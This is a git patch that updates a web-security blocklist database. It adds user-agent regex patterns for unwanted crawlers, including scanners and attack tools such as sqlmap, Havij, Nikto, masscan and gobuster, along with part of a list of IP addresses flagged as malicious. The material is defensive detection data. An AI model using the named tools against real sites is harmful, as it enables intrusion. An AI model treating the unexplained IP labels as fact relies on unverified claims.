From 20945579ce3260c9d8dd635f0f7faf1f143613de Mon Sep 17 00:00:00 2001
From: ghost <ghost@users.noreply.github.com>
Date: Tue, 29 Oct 2024 00:52:43 +0000
Subject: [PATCH] build: Update DB [Tue Oct 29 00:52:43 UTC 2024]

---
 README.md                    |    10 +-
 db/MD5SUMS                   |     7 +
 db/bad-crawlers.txt          |  1411 +++
 db/bad-ip-addresses.txt      | 19297 +++++++++++++++++++++++++++++++++
 db/bad-referrers.txt         |  7105 ++++++++++++
 db/common-web-attacks.json   |     1 +
 db/cves.json                 |     1 +
 db/db.tar.zst                |   Bin 0 -> 569599 bytes
 db/directory-bruteforces.txt |  5339 +++++++++
 9 files changed, 33166 insertions(+), 5 deletions(-)
 create mode 100644 db/MD5SUMS
 create mode 100644 db/bad-crawlers.txt
 create mode 100644 db/bad-ip-addresses.txt
 create mode 100644 db/bad-referrers.txt
 create mode 100644 db/common-web-attacks.json
 create mode 100644 db/cves.json
 create mode 100644 db/db.tar.zst
 create mode 100644 db/directory-bruteforces.txt

diff --git a/README.md b/README.md
index bc45faff..4868cf4f 100644
--- a/README.md
+++ b/README.md
@@ -9,15 +9,15 @@ This collection serves as the primary repository of external resources/datasets
 |     **Datasets**     | **Count** |
 | -------------------- | --------- |
 | Common Web Attack    | 76      |
-| CVEs                 | 2718      |
-| Bad IP Address       | 19836      |
+| CVEs                 | 2724      |
+| Bad IP Address       | 19297      |
 | Bad Referrer         | 7104      |
 | Bad Crawler          | 1410      |
-| Directory Bruteforce | 5332      |
-|       **Total**      | **36476**      |
+| Directory Bruteforce | 5339      |
+|       **Total**      | **35950**      |
 
 > [!NOTE]
-> Last updated at **Mon Oct 28 00:54:04 UTC 2024**.
+> Last updated at **Tue Oct 29 00:52:43 UTC 2024**.
 
 ## Contributions
 
diff --git a/db/MD5SUMS b/db/MD5SUMS
new file mode 100644
index 00000000..9956632d
--- /dev/null
+++ b/db/MD5SUMS
@@ -0,0 +1,7 @@
+d57cfba30adee8c57aecc4dc95883086  bad-crawlers.txt
+0d0c0cd76726bbca28aceb8bdbd440b9  bad-ip-addresses.txt
+8f186aa10b19ce75203890934508f9e1  bad-referrers.txt
+394f8e08f61e118f284f899558f6629f  common-web-attacks.json
+83f787823c0a27ba9f26858848e50660  cves.json
+199e66298cd0facd4cd24e87954f4bea  db.tar.zst
+775441f83d82bac371e04f9844375590  directory-bruteforces.txt
diff --git a/db/bad-crawlers.txt b/db/bad-crawlers.txt
new file mode 100644
index 00000000..89d586c8
--- /dev/null
+++ b/db/bad-crawlers.txt
@@ -0,0 +1,1411 @@
+ YLT
+^Aether
+^Amazon Simple Notification Service Agent$
+^Amazon-Route53-Health-Check-Service
+^Amazon CloudFront
+^b0t$
+^bluefish 
+^Calypso v\/
+^COMODO DCV
+^Corax
+^DangDang
+^DavClnt
+^DHSH
+^docker\/[0-9]
+^Expanse
+^FDM 
+^git\/
+^Goose\/
+^Grabber
+^Gradle\/
+^HTTPClient\/
+^HTTPing
+^Java\/
+^Jeode\/
+^Jetty\/
+^Mail\/
+^Mget
+^Microsoft URL Control
+^Mikrotik\/
+^Netlab360
+^NG\/[0-9\.]
+^NING\/
+^npm\/
+^Nuclei
+^PHP-AYMAPI\/
+^PHP\/
+^pip\/
+^pnpm\/
+^RMA\/
+^Ruby|Ruby\/[0-9]
+^Swurl 
+^TLS tester 
+^twine\/
+^ureq
+^VSE\/[0-9]
+^WordPress\.com
+^XRL\/[0-9]
+^ZmEu
+008\/
+13TABS
+192\.comAgent
+2GDPR\/
+2ip\.ru
+404enemy
+7Siters
+80legs
+a3logics\.in
+A6-Indexer
+Abonti
+Aboundex
+aboutthedomain
+Accoona-AI-Agent
+acebookexternalhit\/
+acoon
+acrylicapps\.com\/pulp
+Acunetix
+AdAuth\/
+adbeat
+AddThis
+ADmantX
+AdminLabs
+adressendeutschland
+adreview\/
+adscanner
+adstxt-worker
+Adstxtaggregator
+adstxt\.com
+Adyen HttpClient
+AffiliateLabz\/
+affilimate-puppeteer
+agentslug
+AHC
+aihit
+aiohttp\/
+Airmail
+akka-http\/
+akula\/
+alertra
+alexa site audit
+Alibaba\.Security\.Heimdall
+Alligator
+allloadin
+AllSubmitter
+alyze\.info
+amagit
+Anarchie
+AndroidDownloadManager
+Anemone
+AngleSharp
+annotate_google
+Anthill
+Anturis Agent
+Ant\.com
+AnyEvent-HTTP\/
+Apache Ant\/
+Apache Droid
+Apache OpenOffice
+Apache-HttpAsyncClient
+Apache-HttpClient
+ApacheBench
+Apexoo
+apimon\.de
+APIs-Google
+AportWorm\/
+AppBeat\/
+AppEngine-Google
+AppleSyndication
+Aprc\/[0-9]
+Arachmo
+arachnode
+Arachnophilia
+aria2
+Arukereso
+asafaweb
+Asana\/
+Ask Jeeves
+AskQuickly
+ASPSeek
+Asterias
+Astute
+asynchttp
+Attach
+attohttpc
+autocite
+AutomaticWPTester
+Autonomy
+awin\.com
+AWS Security Scanner
+axios\/
+a\.pr-cy\.ru
+B-l-i-t-z-B-O-T
+Backlink-Ceck
+BacklinkHttpStatus
+BackStreet
+BackupLand
+BackWeb
+Bad-Neighborhood
+Badass
+baidu\.com
+Bandit
+basicstate
+BatchFTP
+Battleztar Bazinga
+baypup\/
+BazQux
+BBBike
+BCKLINKS
+BDFetch
+BegunAdvertising
+Bewica-security-scan
+Bidtellect
+BigBozz
+Bigfoot
+biglotron
+BingLocalSearch
+BingPreview
+binlar
+biNu image cacher
+Bitacle
+Bitrix link preview
+biz_Directory
+BKCTwitterUnshortener\/
+Black Hole
+Blackboard Safeassign
+BlackWidow
+BlockNote\.Net
+BlogBridge
+Bloglines
+Bloglovin
+BlogPulseLive
+BlogSearch
+Blogtrottr
+BlowFish
+boitho\.com-dc
+Boost\.Beast
+BPImageWalker
+Braintree-Webhooks
+Branch Metrics API
+Branch-Passthrough
+Brandprotect
+Brandwatch
+Brodie\/
+Browsershots
+BUbiNG
+Buck\/
+Buddy
+BuiltWith
+Bullseye
+BunnySlippers
+Burf Search
+Butterfly\/
+BuzzSumo
+CAAM\/[0-9]
+CakePHP
+Calculon
+Canary%20Mail
+CaretNail
+catexplorador
+CC Metadata Scaper
+Cegbfeieh
+censys
+centuryb.o.t9[at]gmail.com
+Cerberian Drtrs
+CERT\.at-Statistics-Survey
+cf-facebook
+cg-eye
+changedetection
+ChangesMeter
+Charlotte
+chatterino-api-cache
+CheckHost
+checkprivacy
+CherryPicker
+ChinaClaw
+Chirp\/
+chkme\.com
+Chlooe
+Chromaxa
+CirrusExplorer
+CISPA Vulnerability Notification
+CISPA Web Analyser
+Citoid
+CJNetworkQuality
+Clarsentia
+clips\.ua\.ac\.be
+Cloud mapping
+CloudEndure
+CloudFlare-AlwaysOnline
+Cloudflare-Healthchecks
+Cloudinary
+cmcm\.com
+coccoc
+cognitiveseo
+ColdFusion
+colly -
+CommaFeed
+Commons-HttpClient
+commonscan
+contactbigdatafr
+contentkingapp
+Contextual Code Sites Explorer
+convera
+CookieReports
+copyright sheriff
+CopyRightCheck
+Copyscape
+cortex\/
+Cosmos4j\.feedback
+Covario-IDS
+Craw\/
+Crescent
+Criteo
+Crowsnest
+CSHttp
+CSSCheck
+Cula\/
+curb
+Curious George
+curl
+cuwhois\/
+cybo\.com
+DAP\/NetHTTP
+DareBoost
+DatabaseDriverMysqli
+DataCha0s
+DatadogSynthetics
+Datafeedwatch
+Datanyze
+DataparkSearch
+dataprovider
+DataXu
+Daum(oa)?[ \/][0-9]
+dBpoweramp
+ddline
+deeris
+delve\.ai
+Demon
+DeuSu
+developers\.google\.com\/\+\/web\/snippet\/
+Devil
+Digg
+Digincore
+DigitalPebble
+Dirbuster
+Discourse Forum Onebox
+Dispatch\/
+Disqus\/
+DittoSpyder
+dlvr
+DMBrowser
+DNSPod-reporting
+docoloc
+Dolphin http client
+DomainAppender
+DomainLabz
+Domains Project\/
+Donuts Content Explorer
+dotMailer content retrieval
+dotSemantic
+downforeveryoneorjustme
+Download Wonder
+downnotifier
+DowntimeDetector
+Drip
+drupact
+Drupal \(\+http:\/\/drupal\.org\/\)
+DTS Agent
+dubaiindex
+DuplexWeb-Google
+DynatraceSynthetic
+EARTHCOM
+Easy-Thumb
+EasyDL
+Ebingbong
+ec2linkfinder
+eCairn-Grabber
+eCatch
+ECCP
+eContext\/
+Ecxi
+EirGrabber
+ElectricMonk
+elefent
+EMail Exractor
+EMail Wolf
+EmailWolf
+Embarcadero
+Embed PHP Library
+Embedly
+endo\/
+europarchive\.org
+evc-batch
+EventMachine HttpClient
+Everwall Link Expander
+Evidon
+Evrinid
+ExactSearch
+ExaleadCloudview
+Excel\/
+exif
+ExoRank
+Exploratodo
+Express WebPictures
+Extreme Picture Finder
+EyeNetIE
+ezooms
+facebookcatalog
+facebookexternalhit
+facebookexternalua
+facebookplatform
+fairshare
+Faraday v
+fasthttp
+Faveeo
+Favicon downloader
+faviconarchive
+faviconkit
+FavOrg
+Feed Wrangler
+Feedable\/
+Feedbin
+FeedBooster
+FeedBucket
+FeedBunch\/
+FeedBurner
+feeder
+Feedly
+FeedshowOnline
+Feedshow\/
+Feedspot
+FeedViewer\/
+Feedwind\/
+FeedZcollector
+feeltiptop
+Fetch API
+Fetch\/[0-9]
+Fever\/[0-9]
+FHscan
+Fiery%20Feeds
+Filestack
+Fimap
+findlink
+findthatfile
+FlashGet
+FlipboardBrowserProxy
+FlipboardProxy
+FlipboardRSS
+Flock\/
+Florienzh\/
+fluffy
+Flunky
+flynxapp
+forensiq
+ForusP
+FoundSeoTool
+fragFINN\.de
+free thumbnails
+Freeuploader
+FreshRSS
+frontman
+Funnelback
+Fuzz Faster U Fool
+G-i-g-a-b-o-t
+g00g1e\.net
+ganarvisitas
+gdnplus\.com
+GeedoProductSearch
+geek-tools
+Genieo
+GentleSource
+GetCode
+Getintent
+GetLinkInfo
+getprismatic
+GetRight
+getroot
+GetURLInfo\/
+GetWeb
+Geziyor
+Ghost Inspector
+GigablastOpenSource
+GIS-LABS
+github-camo
+GitHub-Hookshot
+github\.com
+Go http package
+Go [\d\.]* package http
+Go!Zilla
+Go-Ahead-Got-It
+Go-http-client
+go-mtasts\/
+gobuster
+gobyus
+Gofeed
+gofetch
+Goldfire Server
+GomezAgent
+gooblog
+Goodzer\/
+Google AppsViewer
+Google Desktop
+Google favicon
+Google Keyword Suggestion
+Google Keyword Tool
+Google Page Speed Insights
+Google PP Default
+Google Search Console
+Google Web Preview
+Google-Ads
+Google-Adwords
+Google-Apps-Script
+Google-Calendar-Importer
+Google-HotelAdsVerifier
+Google-HTTP-Java-Client
+Google-InspectionTool
+Google-Podcast
+Google-Publisher-Plugin
+Google-Read-Aloud
+Google-SearchByImage
+Google-Site-Verification
+Google-SMTP-STS
+Google-speakr
+Google-Structured-Data-Testing-Tool
+Google-Transparency-Report
+google-xrawler
+Google-Youtube-Links
+GoogleDocs
+GoogleHC\/
+GoogleOther
+GoogleProber
+GoogleProducer
+GoogleSites
+Gookey
+GoSpotCheck
+gosquared-thumbnailer
+Gotit
+GoZilla
+grabify
+GrabNet
+Grafula
+Grammarly
+GrapeFX
+GreatNews
+Gregarius
+GRequests
+grokkit
+grouphigh
+grub-client
+gSOAP\/
+GT::WWW
+GTmetrix
+GuzzleHttp
+gvfs\/
+HAA(A)?RTLAND http client
+Haansoft
+hackney\/
+Hadi Agent
+HappyApps-WebCheck
+Hardenize
+Hatena
+Havij
+HaxerMen
+HeadlessChrome
+HEADMasterSEO
+HeartRails_Capture
+help@dataminr\.com
+heritrix
+Hexometer
+historious
+hkedcity
+hledejLevne\.cz
+Hloader
+HMView
+Holmes
+HonesoSearchEngine
+HootSuite Image proxy
+Hootsuite-WebFeed
+hosterstats
+HostTracker
+ht:\/\/check
+htdig
+HTMLparser
+htmlyse
+HTTP Banner Detection
+http-get
+HTTP-Header-Abfrage
+http-kit
+http-request\/
+HTTP-Tiny
+HTTP::Lite
+http:\/\/www.neomo.de\/
+HttpComponents
+httphr
+HTTPie
+HTTPMon
+httpRequest
+httpscheck
+httpssites_power
+httpunit
+HttpUrlConnection
+http\.rb\/
+HTTP_Compression_Test
+http_get
+http_request2
+http_requester
+httrack
+huaweisymantec
+HubSpot 
+HubSpot-Link-Resolver
+Humanlinks
+i2kconnect\/
+Iblog
+ichiro
+Id-search
+IdeelaborPlagiaat
+IDG Twitter Links Resolver
+IDwhois\/
+Iframely
+igdeSpyder
+iGooglePortal
+IlTrovatore
+Image Fetch
+Image Sucker
+ImageEngine\/
+ImageVisu\/
+Imagga
+imagineeasy
+imgsizer
+InAGist
+inbound\.li parser
+InDesign%20CC
+Indy Library
+InetURL
+infegy
+infohelfer
+InfoTekies
+InfoWizards Reciprocal Link
+inpwrd\.com
+instabid
+Instapaper
+Integrity
+integromedb
+Intelliseek
+InterGET
+Internet Ninja
+InternetSeer
+internetVista monitor
+internetwache
+internet_archive
+intraVnews
+IODC
+IOI
+Inboxb0t
+iplabel
+ips-agent
+IPS\/[0-9]
+IPWorks HTTP\/S Component
+iqdb\/
+Iria
+Irokez
+isitup\.org
+iskanie
+isUp\.li
+iThemes Sync\/
+IZaBEE
+iZSearch
+JAHHO
+janforman
+Jaunt\/
+Java.*outbrain
+javelin\.io
+Jbrofuzz
+Jersey\/
+JetCar
+Jigsaw
+Jobboerse
+JobFeed discovery
+Jobg8 URL Monitor
+jobo
+Jobrapido
+Jobsearch1\.5
+JoinVision Generic
+JolokiaPwn
+Joomla
+Jorgee
+JS-Kit
+JungleKeyThumbnail
+JustView
+Kaspersky Lab CFR link resolver
+Kelny\/
+Kerrigan\/
+KeyCDN
+Keyword Density
+Keywords Research
+khttp\/
+KickFire
+KimonoLabs\/
+Kml-Google
+knows\.is
+KOCMOHABT
+kouio
+kube-probe
+kubectl
+kulturarw3
+KumKie
+Larbin
+Lavf\/
+leakix\.net
+LeechFTP
+LeechGet
+letsencrypt
+Lftp
+LibVLC
+LibWeb
+Libwhisker
+libwww
+Licorne
+Liferea\/
+Lighthouse
+Lightspeedsystems
+Likse
+limber\.io
+Link Valet
+LinkAlarm\/
+LinkAnalyser
+link-check
+linkCheck
+linkdex
+LinkExaminer
+linkfluence
+linkpeek
+LinkPreview
+LinkScan
+LinksManager
+LinkTiger
+LinkWalker
+link_thumbnailer
+Lipperhey
+Litemage_walker
+livedoor ScreenShot
+LoadImpactRload
+localsearch-web
+LongURL API
+longurl-r-package
+looid\.com
+looksystems\.net
+lscache_runner
+ltx71
+lua-resty-http
+Lucee \(CFML Engine\)
+Lush Http Client
+lwp-request
+lwp-trivial
+LWP::Simple
+lycos
+LYT\.SR
+L\.webis
+mabontland
+MacOutlook\/
+Mag-Net
+MagpieRSS
+Mail::STS
+MailChimp
+Mail\.Ru
+Majestic12
+makecontact\/
+Mandrill
+MapperCmd
+marketinggrader
+MarkMonitor
+MarkWatch
+Mass Downloader
+masscan\/
+Mata Hari
+mattermost
+Mediametric
+Mediapartners-Google
+mediawords
+MegaIndex\.ru
+MeltwaterNews
+Melvil Rawi
+MemGator
+Metaspinner
+MetaURI
+MFC_Tear_Sample
+Microsearch
+Microsoft Data Access
+Microsoft Office
+Microsoft Outlook
+Microsoft Windows Network Diagnostics
+Microsoft-WebDAV-MiniRedir
+Microsoft\.Data\.Mashup
+MicrosoftPreview
+MIDown tool
+MIIxpc
+Mindjet
+Miniature\.io
+Miniflux
+mio_httpc
+Miro-HttpClient
+Mister PiX
+mixdata dot com
+mixed-content-scan
+mixnode
+Mnogosearch
+mogimogi
+Mojeek
+Mojolicious \(Perl\)
+Mollie
+monitis
+Monitority\/
+Monit\/
+montastic
+MonTools
+Moreover
+Morfeus Fucking Scanner
+Morning Paper
+MovableType
+mowser
+Mrcgiguy
+Mr\.4x3 Powered
+MS Web Services Client Protocol
+MSFrontPage
+mShots
+MuckRack\/
+muhstik-scan
+MVAClient
+MxToolbox\/
+myseosnapshot
+nagios
+Najdi\.si
+Name Intelligence
+NameFo\.com
+Nameprotect
+nationalarchives
+Navroad
+nbertaupete95
+NearSite
+Needle
+Nessus
+Net Vampire
+NetAnts
+NETCRAFT
+NetLyzer
+NetMechanic
+NetNewsWire
+Netpursual
+netresearch
+NetShelter ContentScan
+Netsparker
+NetSystemsResearch
+nettle
+NetTrack
+Netvibes
+NetZIP
+Neustar WPM
+NeutrinoAPI
+NewRelicPinger
+NewsBlur .*Finder
+NewsGator
+newsme
+newspaper\/
+Nexgate Ruby Client
+NG-Search
+nghttp2
+Nibbler
+NICErsPRO
+NihilScio
+Nikto
+nineconnections
+NLNZ_IAHarvester
+Nmap Scripting Engine
+node-fetch
+node-superagent
+node-urllib
+Nodemeter
+NodePing
+node\.io
+nominet\.org\.uk
+nominet\.uk
+Norton-Safeweb
+Notifixious
+notifyninja
+NotionEmbedder
+nuhk
+nutch
+Nuzzel
+nWormFeedFinder
+nyawc\/
+Nymesis
+NYU
+Observatory\/
+Ocelli\/
+Octopus
+oegp
+Offline Explorer
+Offline Navigator
+OgScrper
+okhttp
+omgili
+OMSC
+Online Domain Tools
+Open Source RSS
+OpenCalaisSemanticProxy
+Openfind
+OpenLinkProfiler
+Openstat\/
+OpenVAS
+OPPO A33
+Optimizer
+Orbiter
+OrgProbe\/
+orion-semantics
+Outlook-Express
+Outlook-iOS
+Owler
+Owlin
+ownCloud News
+ow\.ly
+OxfordCloudService
+page scorer
+Page Valet
+page2rss
+PageFreezer
+PageGrabber
+PagePeeker
+PageScorer
+Pagespeed\/
+PageThing
+page_verifier
+Panopta
+panscient
+Papa Foto
+parsijoo
+Pavuk
+PayPal IPN
+pcBrowser
+Pcore-HTTP
+PDF24 URL To PDF
+Pearltrees
+PECL::HTTP
+peerindex
+Peew
+PeoplePal
+Perlu -
+PhantomJS Screenshoter
+PhantomJS\/
+Photon\/
+php-requests
+phpservermon
+Pi-Monster
+Picscout
+Picsearch
+PictureFinder
+Pimonster
+Pingability
+PingAdmin\.Ru
+Pingdom
+Pingoscope
+PingSpot
+ping\.blo\.gs
+pinterest\.com
+Pixray
+Pizilla
+Plagger\/
+Pleroma 
+Ploetz \+ Zeller
+Plukkie
+plumanalytics
+PocketImageCache
+PocketParser
+Pockey
+PodcastAddict\/
+POE-Component-Client-HTTP
+Polymail\/
+Pompos
+Porkbun
+Port Monitor
+postano
+postfix-mta-sts-resolver
+PostmanRuntime
+postplanner\.com
+PostPost
+postrank
+PowerPoint\/
+Prebid
+Prerender
+Priceonomics Analysis Engine
+PrintFriendly
+PritTorrent
+Prlog
+probely\.com
+probethenet
+Project ?25499
+Project-Resonance
+prospectb2b
+Protopage
+ProWebWalker
+proximic
+PRTG Network Monitor
+pshtt, https scanning
+PTST 
+PTST\/[0-9]+
+pulsetic\.com
+Pump
+Python-httplib2
+python-httpx
+python-requests
+Python-urllib
+Qirina Hurdler
+QQDownload
+QrafterPro
+Qseero
+Qualidator
+QueryN Metasearch
+queuedriver
+quic-go-HTTP\/
+QuiteRSS
+Quora Link Preview
+Qwantify
+Radian6
+RadioPublicImageResizer
+Railgun\/
+RankActive
+RankFlex
+RankSonicSiteAuditor
+RapidLoad\/
+Re-re Studio
+ReactorNetty
+Readability
+RealDownload
+RealPlayer%20Downloader
+RebelMouse
+Recorder
+RecurPost\/
+redback\/
+ReederForMac
+Reeder\/
+ReGet
+RepoMonkey
+request\.js
+reqwest\/
+ResponseCodeTest
+RestSharp
+Riddler
+Rival IQ
+Robosourcer
+Robozilla
+ROI Hunter
+RPT-HTTPClient
+RSSMix\/
+RSSOwl
+RuxitSynthetic
+RyowlEngine
+safe-agent-scanner
+SalesIntelligent
+Saleslift
+SAP NetWeaver Application Server
+SauceNAO
+SBIder
+sc-downloader
+scalaj-http
+Scamadviser-Frontend
+ScanAlert
+scan\.lol
+Scoop
+scooter
+ScopeContentAG-HTTP-Client
+ScoutJet
+ScoutURLMonitor
+ScrapeBox Page Scanner
+Scrapy
+Screaming
+ScreenShotService
+Scrubby
+Scrutiny\/
+Search37
+searchenginepromotionhelp
+Searchestate
+SearchExpress
+SearchSight
+SearchWP
+search\.thunderstone
+Seeker
+semanticdiscovery
+semanticjuice
+Semiocast HTTP client
+Semrush
+Sendsay\.Ru
+sentry\/
+SEO Browser
+Seo Servis
+seo-nastroj\.cz
+seo4ajax
+Seobility
+SEOCentro
+SeoCheck
+seocompany
+SEOkicks
+SEOlizer
+Seomoz
+SEOprofiler
+seoscanners
+SEOsearch
+seositecheckup
+SEOstats
+servernfo
+sexsearcher
+Seznam
+Shelob
+Shodan
+Shoppimon
+ShopWiki
+ShortLinkTranslate
+shortURL lengthener
+shrinktheweb
+Sideqik
+Siege
+SimplePie
+SimplyFast
+Siphon
+SISTRIX
+Site Sucker
+Site-Shot\/
+Site24x7
+SiteBar
+Sitebeam
+Sitebulb\/
+SiteCondor
+SiteExplorer
+SiteGuardian
+Siteimprove
+SiteIndexed
+Sitemap(s)? Generator
+SitemapGenerator
+SiteMonitor
+Siteshooter B0t
+SiteSnagger
+SiteSucker
+SiteTruth
+Sitevigil
+sitexy\.com
+SkypeUriPreview
+Slack\/
+sli-systems\.com
+slider\.com
+slurp
+SlySearch
+SmartDownload
+SMRF URL Expander
+SMUrlExpander
+Snake
+Snappy
+SnapSearch
+Snarfer\/
+SniffRSS
+sniptracker
+Snoopy
+SnowHaze Search
+sogou web
+SortSite
+Sottopop
+sovereign\.ai
+SpaceBison
+SpamExperts
+Spammen
+Spanner
+Spawning-AI
+spaziodati
+SPDYCheck
+Specificfeeds
+SpeedKit
+speedy
+SPEng
+Spinn3r
+spray-can
+Sprinklr 
+spyonweb
+sqlmap
+Sqlworm
+Sqworm
+SSL Labs
+ssl-tools
+StackRambler
+Statastico\/
+Statically-
+StatusCake
+Steeler
+Stratagems Kumo
+Stripe\/
+Stroke\.cz
+StudioFACA
+StumbleUpon
+suchen
+Sucuri
+summify
+SuperHTTP
+Surphace Scout
+Suzuran
+swcd 
+Symfony BrowserKit
+Symfony2 BrowserKit
+Synapse\/
+Syndirella\/
+SynHttpClient-Built
+Sysomos
+sysscan
+Szukacz
+T0PHackTeam
+tAkeOut
+Tarantula\/
+Taringa UGC
+TarmotGezgin
+tchelebi\.io
+techiaith\.cymru
+Teleport
+Telesoft
+Telesphoreo
+Telesphorep
+Tenon\.io
+teoma
+terrainformatica
+Test Certificate Info
+testuri
+Tetrahedron
+TextRazor Downloader
+The Drop Reaper
+The Expert HTML Source Viewer
+The Intraformant
+The Knowledge AI
+theinternetrules
+TheNomad
+Thinklab
+Thumbor
+Thumbshots
+ThumbSniper
+timewe\.net
+TinEye
+Tiny Tiny RSS
+TLSProbe\/
+Toata
+topster
+touche\.com
+Traackr\.com
+tracemyfile
+Trackuity
+TrapitAgent
+Trendiction
+Trendsmap
+trendspottr
+truwoGPS
+TryJsoup
+TulipChain
+Turingos
+Turnitin
+tweetedtimes
+Tweetminster
+Tweezler\/
+twibble
+Twice
+Twikle
+Twingly
+Twisted PageGetter
+Typhoeus
+ubermetrics-technologies
+uclassify
+UdmSearch
+ultimate_sitemap_parser
+unchaos
+unirest-java
+UniversalFeedParser
+unshortenit
+Unshorten\.It
+Untiny
+UnwindFetchor
+updated
+updown\.io daemon
+Upflow
+Uptimia
+URL Verifier
+Urlcheckr
+URLitor
+urlresolver
+Urlstat
+URLTester
+UrlTrends Ranking Updater
+URLy Warning
+URLy\.Warning
+URL\/Emacs
+Vacuum
+Vagabondo
+VB Project
+vBSEO
+VCI
+Verity
+via ggpht\.com GoogleImageProxy
+Virusdie
+visionutils
+Visual Rights Group
+vkShare
+VoidEYE
+Voil
+voltron
+voyager\/
+VSAgent\/
+VSB-TUO\/
+Vulnbusters Meter
+VYU2
+w3af\.org
+W3C-checklink
+W3C-mobileOK
+W3C_Unicorn
+WAC-OFU
+WakeletLinkExpander
+WallpapersHD
+Wallpapers\/[0-9]+
+wangling
+Wappalyzer
+WatchMouse
+WbSrch\/
+WDT\.io
+Web Auto
+Web Collage
+Web Enhancer
+Web Fetch
+Web Fuck
+Web Pix
+Web Sauger
+Web spyder
+Web Sucker
+web-capture\.net
+Web-sniffer
+Webalta
+Webauskunft
+WebAuto
+WebCapture
+WebClient\/
+webcollage
+WebCookies
+WebCopier
+WebCorp
+WebDataStats
+WebDoc
+WebEnhancer
+WebFetch
+WebFuck
+WebGazer
+WebGo IS
+WebImageCollector
+WebImages
+WebIndex
+webkit2png
+WebLeacher
+webmastercoffee
+webmon 
+WebPix
+WebReaper
+WebSauger
+webscreenie
+Webshag
+Webshot
+Website Quester
+websitepulse agent
+WebsiteQuester
+Websnapr
+WebSniffer
+Webster
+WebStripper
+WebSucker
+webtech\/
+WebThumbnail
+Webthumb\/
+WebWhacker
+WebZIP
+WeLikeLinks
+WEPA
+WeSEE
+wf84
+Wfuzz\/
+wget
+WhatCMS
+WhatsApp
+WhatsMyIP
+WhatWeb
+WhereGoes\?
+Whibse
+WhoAPI\/
+WhoRunsCoinHive
+Whynder Magnet
+Windows-RSS-Platform
+WinHttp-Autoproxy-Service
+WinHTTP\/
+WinPodder
+wkhtmlto
+wmtips
+Woko
+Wolfram HTTPClient
+woorankreview
+WordPress\/
+WordupinfoSearch
+Word\/
+worldping-api
+wotbox
+WP Engine Install Performance API
+WP Rocket
+wpif
+wprecon\.com survey
+WPScan
+wscheck
+Wtrace
+WWW-Collector-E
+WWW-Mechanize
+WWW::Document
+WWW::Mechanize
+WWWOFFLE
+www\.monitor\.us
+x09Mozilla
+x22Mozilla
+XaxisSemanticsClassifier
+XenForo\/
+Xenu Link Sleuth
+XING-contenttabreceiver
+xpymep([0-9]?)\.exe
+Y!J-[A-Z][A-Z][A-Z]
+Yaanb
+yacy
+Yahoo Link Preview
+YahooCacheSystem
+YahooMailProxy
+YahooYSMcm
+YandeG
+Yandex(?!Search)
+yanga
+yeti
+Yo-yo
+Yoleo Consumer
+yomins\.com
+yoogliFetchAgent
+YottaaMonitor
+Your-Website-Sucks
+yourls\.org
+YoYs\.net
+YP\.PL
+Zabbix
+Zade
+Zao
+Zapier
+Zauba
+Zemanta Aggregator
+Zend\\Http\\Client
+Zend_Http_Client
+Zermelo
+Zeus 
+zgrab
+ZnajdzFoto
+ZnHTTP
+Zombie\.js
+Zoom\.Mac
+ZoteroTranslationServer
+ZyBorg
+[a-z0-9\-_]*(bot|crawl|archiver|transcoder|spider|uptime|validator|fetcher|cron|checker|reader|extractor|monitoring|analyzer|scraper)
\ No newline at end of file
diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt
new file mode 100644
index 00000000..c43629af
--- /dev/null
+++ b/db/bad-ip-addresses.txt
@@ -0,0 +1,19297 @@
+1.0.210.36
+1.10.177.59
+1.116.43.201
+1.117.58.215
+1.12.70.28
+1.120.114.174
+1.14.108.22
+1.14.199.204
+1.15.247.236
+1.157.198.42
+1.159.187.202
+1.160.109.47
+1.162.227.126
+1.163.172.172
+1.163.236.225
+1.163.90.124
+1.164.224.70
+1.165.100.6
+1.165.119.240
+1.165.146.40
+1.165.253.107
+1.165.40.5
+1.168.195.235
+1.168.251.147
+1.170.253.63
+1.170.39.134
+1.171.123.163
+1.171.144.130
+1.173.198.97
+1.174.20.156
+1.179.228.195
+1.180.219.212
+1.180.230.98
+1.183.13.194
+1.194.160.101
+1.194.166.30
+1.197.78.123
+1.2.190.235
+1.201.162.20
+1.202.112.1
+1.202.119.31
+1.202.223.2
+1.212.225.99
+1.213.164.27
+1.215.240.130
+1.220.135.218
+1.227.228.136
+1.227.83.100
+1.227.83.22
+1.231.222.19
+1.231.222.20
+1.231.222.21
+1.231.222.22
+1.231.222.23
+1.231.222.24
+1.231.222.25
+1.231.222.26
+1.231.222.29
+1.232.29.63
+1.234.28.71
+1.234.31.117
+1.234.62.237
+1.234.80.59
+1.235.192.130
+1.235.192.131
+1.237.137.30
+1.237.162.20
+1.238.106.229
+1.245.207.104
+1.247.155.239
+1.247.245.61
+1.252.63.242
+1.253.28.16
+1.255.147.114
+1.26.70.70
+1.28.192.118
+1.28.192.150
+1.28.194.22
+1.28.87.246
+1.30.20.2
+1.30.20.238
+1.31.80.166
+1.33.16.190
+1.34.100.72
+1.34.107.46
+1.34.111.115
+1.34.126.178
+1.34.145.215
+1.34.164.40
+1.34.166.2
+1.34.18.203
+1.34.181.220
+1.34.184.117
+1.34.2.141
+1.34.200.86
+1.34.209.215
+1.34.209.79
+1.34.212.100
+1.34.229.120
+1.34.232.138
+1.34.239.180
+1.34.243.17
+1.34.246.245
+1.34.247.157
+1.34.253.240
+1.34.254.21
+1.34.43.114
+1.34.52.67
+1.34.6.132
+1.34.65.133
+1.34.7.7
+1.34.74.88
+1.34.76.241
+1.34.77.234
+1.34.9.93
+1.34.90.127
+1.34.94.21
+1.36.81.113
+1.52.78.32
+1.55.159.34
+1.55.33.86
+1.6.13.39
+1.69.65.40
+1.69.75.80
+1.70.10.239
+1.70.11.36
+1.70.124.246
+1.70.130.12
+1.70.138.130
+1.70.140.31
+1.70.158.32
+1.70.163.249
+1.70.178.214
+1.70.190.45
+1.70.82.99
+1.70.83.177
+1.70.9.108
+1.70.96.64
+1.70.96.83
+1.71.2.174
+1.82.161.53
+1.82.217.54
+1.9.177.11
+1.94.151.27
+100.0.161.38
+100.12.91.119
+100.15.97.125
+100.29.192.1
+100.29.192.10
+100.29.192.100
+100.29.192.101
+100.29.192.105
+100.29.192.106
+100.29.192.108
+100.29.192.111
+100.29.192.115
+100.29.192.118
+100.29.192.119
+100.29.192.120
+100.29.192.121
+100.29.192.123
+100.29.192.124
+100.29.192.126
+100.29.192.127
+100.29.192.13
+100.29.192.14
+100.29.192.16
+100.29.192.19
+100.29.192.2
+100.29.192.20
+100.29.192.22
+100.29.192.23
+100.29.192.24
+100.29.192.25
+100.29.192.26
+100.29.192.27
